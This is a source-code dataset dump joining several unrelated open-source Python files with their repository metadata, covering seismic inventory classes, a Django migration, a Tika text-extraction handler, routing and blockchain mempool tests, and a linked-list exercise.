        return self._authors

    @authors.setter
    def authors(self, values):
        if not hasattr(values, "__iter__"):
            msg = "authors needs to be iterable, e.g. a list."
            raise ValueError(msg)
        self._authors = values
class Site(ComparingObject):
    """
    From the StationXML definition:
        Description of a site location using name and optional geopolitical
        boundaries (country, city, etc.).
    """
    def __init__(self, name="", description=None, town=None, county=None,
                 region=None, country=None):
        """
        :type name: str
        :param name: The commonly used name of this station, equivalent to the
            SEED blockette 50, field 9.
        :type description: str, optional
        :param description: A longer description of the location of this
            station, e.g. "NW corner of Yellowstone National Park" or "20
            miles west of Highway 40."
        :type town: str, optional
        :param town: The town or city closest to the station.
        :type county: str, optional
        :param county: The county.
        :type region: str, optional
        :param region: The state, province, or region of this site.
        :type country: str, optional
        :param country: The country.
        """
        self.name = name
        self.description = description
        self.town = town
        self.county = county
        self.region = region
        self.country = country

    def __str__(self):
        template = ("Site: {name}\n"
                    "\tDescription: {description}\n"
                    "\tTown: {town}\n"
                    "\tCounty: {county}\n"
                    "\tRegion: {region}\n"
                    "\tCountry: {country}")
        return template.format(
            name=self.name, description=self.description, town=self.town,
            county=self.county, region=self.region, country=self.country)

    def _repr_pretty_(self, p, cycle):
        p.text(str(self))
class Latitude(FloatWithUncertaintiesFixedUnit):
    """
    Latitude object

    :type value: float
    :param value: Latitude value
    :type lower_uncertainty: float
    :param lower_uncertainty: Lower uncertainty (aka minusError)
    :type upper_uncertainty: float
    :param upper_uncertainty: Upper uncertainty (aka plusError)
    :type datum: str
    :param datum: Datum for latitude coordinate
    """
    # Valid geographic latitude range, in degrees.
    _minimum = -90
    _maximum = 90
    _unit = "DEGREES"

    def __init__(self, value, lower_uncertainty=None, upper_uncertainty=None,
                 datum=None):
        """
        """
        # Record the datum before delegating numeric handling to the base.
        self.datum = datum
        super(Latitude, self).__init__(
            value, lower_uncertainty=lower_uncertainty,
            upper_uncertainty=upper_uncertainty)
class Longitude(FloatWithUncertaintiesFixedUnit):
    """
    Longitude object

    :type value: float
    :param value: Longitude value
    :type lower_uncertainty: float
    :param lower_uncertainty: Lower uncertainty (aka minusError)
    :type upper_uncertainty: float
    :param upper_uncertainty: Upper uncertainty (aka plusError)
    :type datum: str
    :param datum: Datum for longitude coordinate
    """
    # Valid geographic longitude range, in degrees.
    _minimum = -180
    _maximum = 180
    # Consistency fix: use the private ``_unit`` backing attribute exactly
    # like the parallel ``Latitude`` class above.  Assigning the public
    # ``unit`` name at class level shadows whatever ``unit`` attribute or
    # property FloatWithUncertaintiesFixedUnit provides -- presumably
    # unintended; confirm against the base class.
    _unit = "DEGREES"

    def __init__(self, value, lower_uncertainty=None, upper_uncertainty=None,
                 datum=None):
        """
        """
        # Record the datum before delegating numeric handling to the base.
        self.datum = datum
        super(Longitude, self).__init__(
            value, lower_uncertainty=lower_uncertainty,
            upper_uncertainty=upper_uncertainty)
class Distance(FloatWithUncertaintiesAndUnit):
    """
    Distance object

    :type value: float
    :param value: Distance value
    :type lower_uncertainty: float
    :param lower_uncertainty: Lower uncertainty (aka minusError)
    :type upper_uncertainty: float
    :param upper_uncertainty: Upper uncertainty (aka plusError)
    :type unit: str
    :param unit: Unit for distance measure (defaults to meters).
    """
    def __init__(self, value, lower_uncertainty=None, upper_uncertainty=None,
                 unit="METERS"):
        super(Distance, self).__init__(
            value, lower_uncertainty=lower_uncertainty,
            upper_uncertainty=upper_uncertainty)
        # Override the unit chosen by the base class with the caller's unit.
        self._unit = unit
class Azimuth(FloatWithUncertaintiesFixedUnit):
    """
    Azimuth object: a float restricted to [0, 360] degrees.

    :type value: float
    :param value: Azimuth value
    :type lower_uncertainty: float
    :param lower_uncertainty: Lower uncertainty (aka minusError)
    :type upper_uncertainty: float
    :param upper_uncertainty: Upper uncertainty (aka plusError)
    """
    _minimum = 0
    _maximum = 360
    unit = "DEGREES"
class Dip(FloatWithUncertaintiesFixedUnit):
    """
    Dip object: a float restricted to [-90, 90] degrees.

    :type value: float
    :param value: Dip value
    :type lower_uncertainty: float
    :param lower_uncertainty: Lower uncertainty (aka minusError)
    :type upper_uncertainty: float
    :param upper_uncertainty: Upper uncertainty (aka plusError)
    """
    _minimum = -90
    _maximum = 90
    unit = "DEGREES"
class ClockDrift(FloatWithUncertaintiesFixedUnit):
    """
    ClockDrift object: a non-negative float in seconds per sample.

    :type value: float
    :param value: ClockDrift value
    :type lower_uncertainty: float
    :param lower_uncertainty: Lower uncertainty (aka minusError)
    :type upper_uncertainty: float
    :param upper_uncertainty: Upper uncertainty (aka plusError)
    """
    _minimum = 0
    unit = "SECONDS/SAMPLE"
class SampleRate(FloatWithUncertaintiesFixedUnit):
    """
    SampleRate object, in samples per second.

    :type value: float
    :param value: Sample rate value
    :type lower_uncertainty: float
    :param lower_uncertainty: Lower uncertainty (aka minusError)
    :type upper_uncertainty: float
    :param upper_uncertainty: Upper uncertainty (aka plusError)
    """
    unit = "SAMPLES/S"
class Frequency(FloatWithUncertaintiesFixedUnit):
    """
    Frequency object, in Hertz.

    :type value: float
    :param value: Frequency value
    :type lower_uncertainty: float
    :param lower_uncertainty: Lower uncertainty (aka minusError)
    :type upper_uncertainty: float
    :param upper_uncertainty: Upper uncertainty (aka plusError)
    """
    unit = "HERTZ"
class Angle(FloatWithUncertaintiesFixedUnit):
    """
    Angle object: a float restricted to [-360, 360] degrees.

    :type value: float
    :param value: Angle value
    :type lower_uncertainty: float
    :param lower_uncertainty: Lower uncertainty (aka minusError)
    :type upper_uncertainty: float
    :param upper_uncertainty: Upper uncertainty (aka plusError)
    """
    _minimum = -360
    _maximum = 360
    unit = "DEGREES"
def _unified_content_strings(contents):
    """
    Collapse a list of content strings into unique, sorted summaries.

    Duplicates are rendered as ``"<item> (<count>x)"``; unique entries are
    kept verbatim.  The result is ordered by :func:`_seed_id_keyfunction`.

    :type contents: list of str
    :param contents: Raw (possibly repeated) content strings.
    :rtype: list of str
    """
    # Performance fix: Counter counts all items in one O(n) pass instead of
    # one O(n) ``contents.count(item)`` scan per unique item (O(n**2)).
    counts = Counter(contents)
    return [item if count == 1 else "{} ({}x)".format(item, count)
            for item, count in sorted(
                counts.items(), key=lambda kv: _seed_id_keyfunction(kv[0]))]
# make TextWrapper only split on colons, so that we avoid splitting in between
# e.g. network code and network code occurence count (can be controlled with
# class attributes).
# Also avoid lines starting with ", " (need to patch the class for this)
class InventoryTextWrapper(TextWrapper):
    # Restrict both of TextWrapper's word-separator regexes so that wrapping
    # may only happen at ", " sequences.
    wordsep_re = re.compile(r'(, )')
    wordsep_simple_re = re.compile(r'(, )')
    def _wrap_chunks(self, *args, **kwargs):
        """
        Wrap chunks as TextWrapper does, then strip a single leading ", "
        that can end up at the start of a continuation line.
        """
        # the following doesn't work somehow (likely because of future??)
        # lines = super(InventoryTextWrapper, self)._wrap_chunks(
        #     *args, **kwargs)
        lines = TextWrapper._wrap_chunks(self, *args, **kwargs)
        lines = [re.sub(r'([\b\s]+), (.*)', r'\1\2', line, count=1)
                 for line in lines]
        return lines
def _textwrap(text, *args, **kwargs):
    """Wrap *text* with an :class:`InventoryTextWrapper` instance."""
    wrapper = InventoryTextWrapper(*args, **kwargs)
    return wrapper.wrap(text)
def _seed_id_keyfunction(x):
"""
Keyfunction to use in sorting two (partial) SEED IDs
Assumes that the last (or only) "."-separated part is a channel code.
Assumes the last character is a the component code and sorts it
"Z"-"N"-"E"-others_lexical.
"""
# for comparison we build a list of 5 SEED code pieces:
# [network, station, location, band+instrument, component]
# with partial codes (i.e. not 4 fields after splitting at dots),
# we go with the following assumptions (these seem a bit random, but that's
# what can be encountered in string representations of the Inventory object
# hierarchy):
# - no dot means network code only (e.g. "IU")
# - one dot means network.station code only (e.g. "IU.ANMO")
# - two dots means station.location.channel code only (e.g. "ANMO.10.BHZ")
# - three dots: full SEED ID (e.g. "IU.ANMO.10.BHZ")
# - more dots: sort after any of the previous, plain lexical sort
# if no "." in the string: assume it's a network code
# split to get rid of the description that that is added to networks and
# stations which might also contain dots.
number_of_dots = x.strip().split()[0].count(".")
x = x.upper()
if number_of_dots == 0:
x = [x] + [""] * 4
elif number_of_dots == 1:
x = x.split(".") + [""] * 3
elif number_of_dots in (2, 3):
x = x.split(".")
if number_of_dots == 2:
x = [""] + x
# split channel code into band+instrument code and component code
x = x[:-1] + [x[-1][:-1], x[-1] and x[-1][-1] or '']
# special comparison for component code, convert "ZNE" to integers
# which compare less than any character
comp = "ZNE".find(x[-1])
# last item is component code, either the original 1-char string, or an
# int from 0-2 if any of "ZNE". Python3 does not allow comparison of
# int and string anymore (Python 2 always compares ints smaller than
# any string), so we need to work around this by making this last item
# a tuple with first item False for ints and True for strings.
if comp >= 0:
x[-1] = (False, comp)
else:
x[-1] = (True, x[-1])
# all other cases, just convert the upper case string to a single item
# list - it will compare greater than any of the split lists.
else:
x = [x, ]
return x
if __name__ == '__main__':
    # Run this module's doctests when executed directly.
    import doctest
    doctest.testmod(exclude_empty=True)
| 33.8
| 79
| 0.625543
|
4a01fc65bf751adb385ee27f14149ec365da06af
| 1,911
|
py
|
Python
|
thecut/googleanalytics/migrations/0001_initial.py
|
thecut/thecut-googleanalytics
|
8d0a9869829f15d5a630ed85e5d9a7ea9d4825fc
|
[
"Apache-2.0"
] | 1
|
2019-08-13T21:05:10.000Z
|
2019-08-13T21:05:10.000Z
|
thecut/googleanalytics/migrations/0001_initial.py
|
thecut/thecut-googleanalytics
|
8d0a9869829f15d5a630ed85e5d9a7ea9d4825fc
|
[
"Apache-2.0"
] | null | null | null |
thecut/googleanalytics/migrations/0001_initial.py
|
thecut/thecut-googleanalytics
|
8d0a9869829f15d5a630ed85e5d9a7ea9d4825fc
|
[
"Apache-2.0"
] | 2
|
2017-05-18T04:44:22.000Z
|
2020-02-27T01:57:41.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import oauth2client.django_orm
class Migration(migrations.Migration):
    """Initial schema for the googleanalytics app.

    Creates the ``Profile`` model (one per Django site), a one-to-one
    holder for its OAuth2 credentials, and the link back to
    ``sites.Site``.  This is a historical migration: do not edit field
    definitions after it has been applied anywhere.
    """

    dependencies = [
        # Requires the django.contrib.sites tables to exist first.
        ('sites', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('web_property_id', models.CharField(help_text='The property tracking ID is available when viewing the "Tracking Code" details in the Google Analytics admin.', max_length=25, verbose_name='property tracking ID')),
                ('profile_id', models.CharField(default='', max_length=25, verbose_name='view (profile) ID', blank=True)),
                ('display_features', models.BooleanField(default=False, help_text='Used for remarketing, demographics and interest reporting.', verbose_name='Use Display advertising features?')),
                ('is_enabled', models.BooleanField(default=False, help_text='Is Google Analytics tracking enabled on the website?', verbose_name='enabled')),
            ],
            options={
                'ordering': ['site'],
                'verbose_name': 'view (profile)',
                'verbose_name_plural': 'views (profiles)',
            },
        ),
        migrations.CreateModel(
            name='ProfileOAuth2Credentials',
            fields=[
                # Shares its primary key with Profile (one-to-one).
                ('id', models.OneToOneField(related_name='_oauth2_credentials', primary_key=True, serialize=False, to='googleanalytics.Profile')),
                ('credentials', oauth2client.django_orm.CredentialsField(null=True)),
            ],
        ),
        migrations.AddField(
            model_name='profile',
            name='site',
            field=models.OneToOneField(related_name='+', to='sites.Site'),
        ),
    ]
| 44.44186
| 229
| 0.618524
|
4a01fca0feb53ef5e987108efa7387678f3a176a
| 109
|
py
|
Python
|
esmvalcore/cmor/_fixes/cmip6/e3sm_1_0.py
|
markelg/ESMValCore
|
b2f7ffc3232f174dd5ebc50ad20b4a02d3517c2c
|
[
"Apache-2.0"
] | 26
|
2019-06-07T07:50:07.000Z
|
2022-03-22T21:04:01.000Z
|
esmvalcore/cmor/_fixes/cmip6/e3sm_1_0.py
|
markelg/ESMValCore
|
b2f7ffc3232f174dd5ebc50ad20b4a02d3517c2c
|
[
"Apache-2.0"
] | 1,370
|
2019-06-06T09:03:07.000Z
|
2022-03-31T04:37:20.000Z
|
esmvalcore/cmor/_fixes/cmip6/e3sm_1_0.py
|
zklaus/ESMValCore
|
5656fb8b546eeb4d750a424de7ed56a237edfabb
|
[
"Apache-2.0"
] | 26
|
2019-07-03T13:08:48.000Z
|
2022-03-02T16:08:47.000Z
|
"""Fixes for E3SM-1-0 model."""
from ..common import ClFixHybridPressureCoord
Cl = ClFixHybridPressureCoord
| 21.8
| 45
| 0.779817
|
4a01fd0409d8b31b2d0e58c3a2de7cae61dccf7d
| 2,568
|
py
|
Python
|
research/compression/entropy_coder/dataset/gen_synthetic_dataset.py
|
vincentcheny/models
|
afb1a59fc1bc792ac72d1a3e22e2469020529788
|
[
"Apache-2.0"
] | 1
|
2019-09-11T09:41:11.000Z
|
2019-09-11T09:41:11.000Z
|
research/compression/entropy_coder/dataset/gen_synthetic_dataset.py
|
vincentcheny/models
|
afb1a59fc1bc792ac72d1a3e22e2469020529788
|
[
"Apache-2.0"
] | null | null | null |
research/compression/entropy_coder/dataset/gen_synthetic_dataset.py
|
vincentcheny/models
|
afb1a59fc1bc792ac72d1a3e22e2469020529788
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generate a synthetic dataset."""
import os
import numpy as np
from six.moves import xrange
import tensorflow as tf
import synthetic_model
FLAGS = tf.app.flags.FLAGS

# Command-line flags controlling where the dataset is written and how
# many samples are generated.
tf.app.flags.DEFINE_string(
    'dataset_dir', None,
    """Directory where to write the dataset and the configs.""")
tf.app.flags.DEFINE_integer(
    'count', 1000,
    """Number of samples to generate.""")
def int64_feature(values):
    """Wrap *values* (a scalar or a tuple/list of ints) in a TF-Feature.

    Returns:
      A tf.train.Feature holding an Int64List.
    """
    wrapped = values if isinstance(values, (tuple, list)) else [values]
    return tf.train.Feature(int64_list=tf.train.Int64List(value=wrapped))
def float_feature(values):
    """Wrap *values* (a scalar or a tuple/list of floats) in a TF-Feature.

    Returns:
      A tf.train.Feature holding a FloatList.
    """
    wrapped = values if isinstance(values, (tuple, list)) else [values]
    return tf.train.Feature(float_list=tf.train.FloatList(value=wrapped))
def AddToTFRecord(code, tfrecord_writer):
    """Serialize one code array as a tf.train.Example and write it out."""
    features = tf.train.Features(feature={
        'code_shape': int64_feature(code.shape),
        'code': float_feature(code.flatten().tolist()),
    })
    example = tf.train.Example(features=features)
    tfrecord_writer.write(example.SerializeToString())
def GenerateDataset(filename, count, code_shape):
    """Write `count` synthetic codes of shape `code_shape` to a TFRecord file."""
    with tf.python_io.TFRecordWriter(filename) as writer:
        for _ in xrange(count):
            binary_code = synthetic_model.GenerateSingleCode(code_shape)
            # Remap binary {0,1} codes to symmetric {-1,+1} codes.
            signed_code = 2.0 * binary_code - 1.0
            AddToTFRecord(signed_code, writer)
def main(argv=None):  # pylint: disable=unused-argument
    """Generate the synthetic dataset at <dataset_dir>/synthetic_dataset.

    Bug fix: the original concatenated the file name onto the directory
    inside a single-argument os.path.join call; directory and file name
    are separate path components and belong in separate join arguments.
    """
    GenerateDataset(os.path.join(FLAGS.dataset_dir, 'synthetic_dataset'),
                    FLAGS.count,
                    [35, 48, 8])
if __name__ == '__main__':
    # tf.app.run() parses the flags, then calls main().
    tf.app.run()
| 28.533333
| 81
| 0.6581
|
4a01fd75de6859fd55b889286e85c9cba6b867ae
| 521
|
py
|
Python
|
pp/routing/test_route_south.py
|
flaport/gdsfactory
|
1f2e844c1fe27b9c6340e2d51500fd3358fa16e5
|
[
"MIT"
] | 8
|
2020-08-25T11:25:18.000Z
|
2022-03-27T11:32:11.000Z
|
pp/routing/test_route_south.py
|
flaport/gdsfactory
|
1f2e844c1fe27b9c6340e2d51500fd3358fa16e5
|
[
"MIT"
] | null | null | null |
pp/routing/test_route_south.py
|
flaport/gdsfactory
|
1f2e844c1fe27b9c6340e2d51500fd3358fa16e5
|
[
"MIT"
] | 1
|
2022-03-04T07:03:29.000Z
|
2022-03-04T07:03:29.000Z
|
import numpy as np
import pp
@pp.cell
def test_route_south():
    """Route an MMI 2x2 south and check the resulting route lengths.

    Bug fix: a leftover debug loop printed every route length before the
    assertion loop ran over the same pairs; the redundant print loop is
    removed.
    """
    c = pp.Component()
    cr = c << pp.c.mmi2x2()
    routes, ports = pp.routing.route_south(cr)
    l1 = 17.207963267948966
    l2 = 22.35796326794896
    lengths = [l1, l2, l1, l2]
    for route, length in zip(routes, lengths):
        assert np.isclose(route.parent.length, length)
    c.add(routes)
    return c
if __name__ == "__main__":
c = test_route_south()
pp.show(c)
| 19.296296
| 50
| 0.621881
|
4a01fdea04e27e0a1adde9138ac9925bec28d6d6
| 950
|
py
|
Python
|
function/handler.py
|
saidsef/tika-document-to-text
|
3e1d71ccb2a67c62429d91cfe09f36fe23936caf
|
[
"MIT"
] | null | null | null |
function/handler.py
|
saidsef/tika-document-to-text
|
3e1d71ccb2a67c62429d91cfe09f36fe23936caf
|
[
"MIT"
] | 10
|
2022-01-14T12:07:27.000Z
|
2022-03-01T15:36:56.000Z
|
function/handler.py
|
saidsef/tika-document-to-text
|
3e1d71ccb2a67c62429d91cfe09f36fe23936caf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import logging
from os import environ
from json import loads
from subprocess import Popen, PIPE
# Module logging setup.  NOTE(review): the getLogger() result is discarded —
# only basicConfig below has an effect; presumably the logger was meant to be
# bound to a name.
logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
def byte2json(b):
    """Parse Tika's JSON output bytes and return the extracted text.

    Args:
        b (bytes): UTF-8 JSON document list produced by the Tika CLI.

    Returns:
        The "X-TIKA:content" text of the first document when present and
        non-empty; otherwise the full parsed document.
    """
    # NOTE(review): the blanket quote substitution assumes the payload never
    # contains literal single quotes inside content — fragile; confirm
    # against real Tika output.
    doc = loads(b.decode("utf-8").replace("'", '"'))
    # Robustness fix: .get() instead of [] so a document without the content
    # key falls through to returning the document instead of raising
    # KeyError; also guard against an empty document list.
    content = doc[0].get("X-TIKA:content") if doc else None
    if content:
        return content
    return doc
def handle(req):
    """Extract plain text from the document at `req` via the Apache Tika CLI.

    Args:
        req (str): request body — a path/URL handed to Tika.

    Returns:
        str: the extracted text, or a JSON error payload when Tika
        produced no stdout output.
    """
    from json import dumps  # local: only needed for the fallback/error paths

    env = environ.copy()
    p = Popen([
        "java", "-cp",
        "{}".format(env['CLASSPATH']),
        "org.apache.tika.cli.TikaCLI",
        "-J", "-t",
        "{}".format(req)], stdout=PIPE, stderr=PIPE, env=env)
    out, err = p.communicate()
    data = []
    if len(out) > 0:
        parsed = byte2json(out)
        # byte2json may return the parsed document (a list) rather than a
        # string; serialize it so the join below cannot raise TypeError.
        data.append(parsed if isinstance(parsed, str) else dumps(parsed))
    if len(out) < 1 and len(err) > 0:
        # Bug fix: the original appended a dict here, which made
        # "\n\n".join(data) raise TypeError on the error path.
        data.append(dumps({"error": "{}".format(err), "url": "{}".format(req)}))
    return "\n\n".join(data).rstrip()
| 24.358974
| 73
| 0.569474
|
4a01fdeeb926bfea9e93e0a1d6ef9862c346619f
| 1,602
|
py
|
Python
|
medium/86-partition-list.py
|
wanglongjiang/leetcode
|
c61d2e719e81575cfb5bde9d64e15cee7cf01ef3
|
[
"MIT"
] | 2
|
2021-03-14T11:38:26.000Z
|
2021-03-14T11:38:30.000Z
|
medium/86-partition-list.py
|
wanglongjiang/leetcode
|
c61d2e719e81575cfb5bde9d64e15cee7cf01ef3
|
[
"MIT"
] | null | null | null |
medium/86-partition-list.py
|
wanglongjiang/leetcode
|
c61d2e719e81575cfb5bde9d64e15cee7cf01ef3
|
[
"MIT"
] | 1
|
2022-01-17T19:33:23.000Z
|
2022-01-17T19:33:23.000Z
|
'''
分隔链表
给你一个链表的头节点 head 和一个特定值 x ,请你对链表进行分隔,使得所有 小于 x 的节点都出现在 大于或等于 x 的节点之前。
你应当 保留 两个分区中每个节点的初始相对位置。
'''
from typing import List
class ListNode:
    """Singly linked list node."""

    def __init__(self, val=0, next=None):
        self.val = val  # node payload
        self.next = next  # following node, or None at the tail
'''
思路:从头搜索,所有找到的小于x的节点,都从原链表删除,加入链表lessLi。
遍历一次之后,所有小于x的节点都按照原顺序处于lessLi中,将lessLi与原链表连结起来
时间复杂度:O(n),只需要遍历一次链表
'''
class Solution:
    """LeetCode 86 — Partition List."""

    def partition(self, head: ListNode, x: int) -> ListNode:
        """Stably partition the list so nodes < x precede nodes >= x.

        Builds two chains (less-than and greater-or-equal) in a single
        pass, preserving the original relative order within each chain,
        then splices them together.  O(n) time, O(1) extra space.
        """
        less_head = ListNode()  # dummy head for the < x chain
        ge_head = ListNode()    # dummy head for the >= x chain
        less_tail, ge_tail = less_head, ge_head
        node = head
        while node:
            if node.val < x:
                less_tail.next = node
                less_tail = node
            else:
                ge_tail.next = node
                ge_tail = node
            node = node.next
        ge_tail.next = None            # terminate the second chain
        less_tail.next = ge_head.next  # splice the two chains together
        return less_head.next
def fromList(li: List[int]):
    """Build a linked list from a Python list; return its head (None if empty)."""
    dummy = ListNode()
    tail = dummy
    for item in li:
        tail.next = ListNode(item)
        tail = tail.next
    return dummy.next
def toList(listNode: ListNode):
    """Collect the node values of a linked list into a Python list."""
    values = []
    node = listNode
    while node is not None:
        values.append(node.val)
        node = node.next
    return values
# Ad-hoc smoke test of the partition logic on two sample lists.
s = Solution()
print(toList(s.partition(fromList([1, 4, 3, 2, 5, 2]), 3)))
print(toList(s.partition(fromList([2, 1]), 2)))
| 22.56338
| 68
| 0.54432
|
4a01fe9133d324ce02652d84e899ca1f2953cf4a
| 4,258
|
py
|
Python
|
chroma_core/services/lustre_audit/update_scan.py
|
intel-hpdd/-intel-manager-for-lustre
|
f8a6f61205b42cc62f4bbcb8d81214ad4f215cd6
|
[
"MIT"
] | 52
|
2018-09-13T03:26:23.000Z
|
2022-03-25T16:51:37.000Z
|
chroma_core/services/lustre_audit/update_scan.py
|
intel-hpdd/-intel-manager-for-lustre
|
f8a6f61205b42cc62f4bbcb8d81214ad4f215cd6
|
[
"MIT"
] | 1,264
|
2018-06-15T19:50:57.000Z
|
2022-03-28T08:19:04.000Z
|
chroma_core/services/lustre_audit/update_scan.py
|
whamcloud/intel-manager-for-lustre
|
f8a6f61205b42cc62f4bbcb8d81214ad4f215cd6
|
[
"MIT"
] | 27
|
2018-06-18T08:51:59.000Z
|
2022-03-16T15:35:34.000Z
|
#!/usr/bin/env python
# Copyright (c) 2020 DDN. All rights reserved.
# Use of this source code is governed by a MIT-style
# license that can be found in the LICENSE file.
from itertools import chain
from chroma_core.services import log_register
from chroma_core.models.host import ManagedHost
from chroma_core.services.job_scheduler import job_scheduler_notify
from iml_common.lib.date_time import IMLDateTime
from iml_common.lib.package_version_info import VersionInfo
log = log_register(__name__)
class UpdateScan(object):
    """Processes one host's periodic audit payload (mounts/metrics/packages)."""

    def __init__(self):
        self.audited_mountables = {}
        self.host = None  # ManagedHost being audited (set in run())
        self.host_data = None  # raw payload dict received from the agent

    def is_valid(self):
        """Return True when the payload has the minimum expected structure."""
        try:
            assert isinstance(self.host_data, dict)
            assert "mounts" in self.host_data
            assert "metrics" in self.host_data
            assert "resource_locations" in self.host_data
            # TODO: more thorough validation
            return True
        except AssertionError:
            return False

    def audit_host(self):
        # "packages" may be absent from the payload; update_packages
        # tolerates None.
        self.update_packages(self.host_data.get("packages"))

    def run(self, host_id, host_data):
        """Entry point: look up the host and audit the supplied payload.

        :param host_id: primary key of the ManagedHost to audit.
        :param host_data: payload dict; must carry an ISO "started_at".
        """
        host = ManagedHost.objects.get(pk=host_id)
        self.started_at = IMLDateTime.parse(host_data["started_at"])
        self.host = host
        self.host_data = host_data
        log.debug("UpdateScan.run: %s" % self.host)
        self.audit_host()

    # Compatibility with pre-4.1 IML upgrades
    def update_packages(self, package_report):
        """Decide whether the host needs a package update and notify the
        job scheduler with the resulting "needs_update" flag."""
        if not package_report:
            # Packages is allowed to be None
            # (means is not the initial message, or there was a problem talking to RPM or yum)
            return

        # An update is required if:
        # * A package is installed on the storage server for which there is a more recent version
        #   available on the manager
        # or
        # * A package is available on the manager, and specified in the server's profile's list of
        #   packages, but is not installed on the storage server.
        def _version_info_list(package_data):
            # package_data rows are (EPOCH, VERSION, RELEASE, ARCH) tuples.
            return [VersionInfo(*package) for package in package_data]

        def _updates_available(installed_versions, available_versions):
            # versions are of form (EPOCH, VERSION, RELEASE, ARCH)
            # Map of arch to highest installed version
            max_installed_version = {}
            for installed_info in installed_versions:
                max_inst = max_installed_version.get(installed_info.arch, None)
                if max_inst is None or installed_info > max_inst:
                    max_installed_version[installed_info.arch] = installed_info
            for available_info in available_versions:
                max_inst = max_installed_version.get(available_info.arch, None)
                if max_inst is not None and available_info > max_inst:
                    log.debug("Update available: %s > %s" % (available_info, max_inst))
                    return True
            return False

        updates = False
        repos = package_report.keys()
        for package_name in set(chain(self.host.server_profile.base_packages, self.host.server_profile.packages)):
            # Find the first repo that carries this package.
            package_data = {}
            for repo in repos:
                try:
                    package_data = package_report[repo][package_name]
                except KeyError:
                    continue
                break
            if not package_data:
                log.warning("Required Package %s not available for %s" % (package_name, self.host))
                continue
            if not package_data["installed"]:
                log.info("Update available (not installed): %s on %s" % (package_name, self.host))
                updates = True
                break
            if _updates_available(
                _version_info_list(package_data["installed"]), _version_info_list(package_data["available"])
            ):
                log.info("Update needed: %s on %s" % (package_name, self.host))
                updates = True
                break
        log.info("update_packages(%s): updates=%s" % (self.host, updates))
        job_scheduler_notify.notify(self.host, self.started_at, {"needs_update": updates})
| 37.681416
| 114
| 0.62635
|
4a01fef7ca6d7a770a883652bd2f5f384268c736
| 2,906
|
py
|
Python
|
test/functional/mempool_resurrect.py
|
cicxcoin/cicoin
|
b48b11574ae38ae063670a755b9d50ef6960e1e8
|
[
"MIT"
] | 3
|
2020-06-19T11:21:43.000Z
|
2021-02-16T16:29:13.000Z
|
test/functional/mempool_resurrect.py
|
Madurajaya/cicoin
|
b48b11574ae38ae063670a755b9d50ef6960e1e8
|
[
"MIT"
] | 1
|
2020-04-29T20:15:13.000Z
|
2020-04-29T20:15:13.000Z
|
test/functional/mempool_resurrect.py
|
Madurajaya/cicoin
|
b48b11574ae38ae063670a755b9d50ef6960e1e8
|
[
"MIT"
] | 4
|
2020-01-25T06:31:23.000Z
|
2022-02-28T05:36:12.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Cicoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test resurrection of mined transactions when the blockchain is re-organized."""
from test_framework.blocktools import create_raw_transaction
from test_framework.test_framework import CicoinTestFramework
from test_framework.util import assert_equal
class MempoolCoinbaseTest(CicoinTestFramework):
    """Check that transactions mined in invalidated blocks re-enter the mempool."""

    def set_test_params(self):
        self.num_nodes = 1

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def run_test(self):
        node0_address = self.nodes[0].getnewaddress()
        # Spend block 1/2/3's coinbase transactions
        # Mine a block.
        # Create three more transactions, spending the spends
        # Mine another block.
        # ... make sure all the transactions are confirmed
        # Invalidate both blocks
        # ... make sure all the transactions are put back in the mempool
        # Mine a new block
        # ... make sure all the transactions are confirmed again.
        b = [self.nodes[0].getblockhash(n) for n in range(1, 4)]
        coinbase_txids = [self.nodes[0].getblock(h)['tx'][0] for h in b]
        spends1_raw = [create_raw_transaction(self.nodes[0], txid, node0_address, amount=49.99) for txid in coinbase_txids]
        spends1_id = [self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw]
        blocks = []
        blocks.extend(self.nodes[0].generate(1))
        spends2_raw = [create_raw_transaction(self.nodes[0], txid, node0_address, amount=49.98) for txid in spends1_id]
        spends2_id = [self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw]
        blocks.extend(self.nodes[0].generate(1))
        # mempool should be empty, all txns confirmed
        assert_equal(set(self.nodes[0].getrawmempool()), set())
        for txid in spends1_id+spends2_id:
            tx = self.nodes[0].gettransaction(txid)
            assert tx["confirmations"] > 0
        # Use invalidateblock to re-org back
        for node in self.nodes:
            node.invalidateblock(blocks[0])
        # All txns should be back in mempool with 0 confirmations
        assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
        for txid in spends1_id+spends2_id:
            tx = self.nodes[0].gettransaction(txid)
            assert tx["confirmations"] == 0
        # Generate another block, they should all get mined
        self.nodes[0].generate(1)
        # mempool should be empty, all txns confirmed
        assert_equal(set(self.nodes[0].getrawmempool()), set())
        for txid in spends1_id+spends2_id:
            tx = self.nodes[0].gettransaction(txid)
            assert tx["confirmations"] > 0
if __name__ == '__main__':
    # Run the functional test directly.
    MempoolCoinbaseTest().main()
| 40.929577
| 123
| 0.674123
|
4a0200a9822e8b4649bb305ce78cf281e6d3a6c9
| 17,492
|
py
|
Python
|
services/core/DNP3Agent/dnp3/mesa/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | 406
|
2015-01-20T03:08:53.000Z
|
2022-03-31T20:59:07.000Z
|
services/core/DNP3Agent/dnp3/mesa/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | 2,031
|
2015-01-05T21:35:45.000Z
|
